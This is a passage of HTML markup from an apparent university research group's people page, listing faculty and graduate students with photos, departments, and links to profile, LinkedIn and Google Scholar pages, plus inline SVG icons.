70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c473-outer\">\n            <div data-colibri-id=\"182-c473\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c473 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c474\" class=\"d-block style-973 style-local-182-c474 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c474-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c474-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c475\" class=\"h-global-transition-all h-heading style-974 style-local-182-c475 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c475\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c476\" class=\"h-text h-text-component style-975 style-local-182-c476 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c477\" class=\"h-text h-text-component style-976 style-local-182-c477 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c478\" class=\"style-977 style-local-182-c478 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c479-outer\">\n            <div data-colibri-id=\"182-c479\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c479 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c480\" class=\"d-block style-973 style-local-182-c480 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c480-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c480-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c481\" class=\"h-global-transition-all h-heading style-974 style-local-182-c481 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c481\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c482\" class=\"h-text h-text-component style-975 style-local-182-c482 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c483\" class=\"h-text h-text-component style-976 style-local-182-c483 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c484\" class=\"style-977 style-local-182-c484 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c70\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c70 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c96\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c96 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c97-outer\">\n            <div data-colibri-id=\"182-c97\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c97 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c98\" class=\"h-global-transition-all h-heading style-862 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c98\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c71\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c71 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c78-outer\">\n            <div data-colibri-id=\"182-c78\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c78 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c79\" class=\"d-block style-854 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c79-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c79-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"h-global-transition-all h-heading style-850 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c80\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c81\" class=\"h-text h-text-component style-851 style-local-182-c81 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c246\" class=\"h-text h-text-component style-902 style-local-182-c246 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"style-855 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c72-outer\">\n            <div data-colibri-id=\"182-c72\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c72 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c73\" class=\"d-block style-849 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c73-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c73-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"h-global-transition-all h-heading style-850 